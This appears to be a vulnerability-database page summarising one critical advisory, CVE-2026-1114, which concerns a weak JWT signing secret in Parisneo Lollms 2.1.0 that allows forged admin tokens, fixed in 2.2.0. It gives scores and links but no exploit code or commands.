Parisneo Lollms

1 CVEs product

Monthly

Sort: Newest CVSS Score EPSS Score Oldest
CVE-2026-1114 CRITICAL Act Now

JWT secret key brute-forcing in Parisneo Lollms 2.1.0 allows unauthenticated remote attackers to forge administrative tokens and achieve full system compromise. The application uses a weak secret for signing JSON Web Tokens, enabling offline attacks to recover credentials and escalate privileges to administrator level. With CVSS 9.8 (critical network-accessible attack requiring no privileges) and EPSS data unavailable, this represents a severe authentication bypass in AI/LLM management software. Fixed in version 2.2.0. No public exploit identified at time of analysis, though the attack technique (JWT cracking) is well-documented.

AI / ML Jwt Attack Privilege Escalation Parisneo Lollms
NVD GitHub
CVSS 3.0
9.8
EPSS
0.0%
CVE-2026-1114
EPSS 0% CVSS 9.8
CRITICAL Act Now

JWT secret key brute-forcing in Parisneo Lollms 2.1.0 allows unauthenticated remote attackers to forge administrative tokens and achieve full system compromise. The application uses a weak secret for signing JSON Web Tokens, enabling offline attacks to recover credentials and escalate privileges to administrator level. With CVSS 9.8 (critical network-accessible attack requiring no privileges) and EPSS data unavailable, this represents a severe authentication bypass in AI/LLM management software. Fixed in version 2.2.0. No public exploit identified at time of analysis, though the attack technique (JWT cracking) is well-documented.

AI / ML Jwt Attack Privilege Escalation +1
NVD GitHub

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy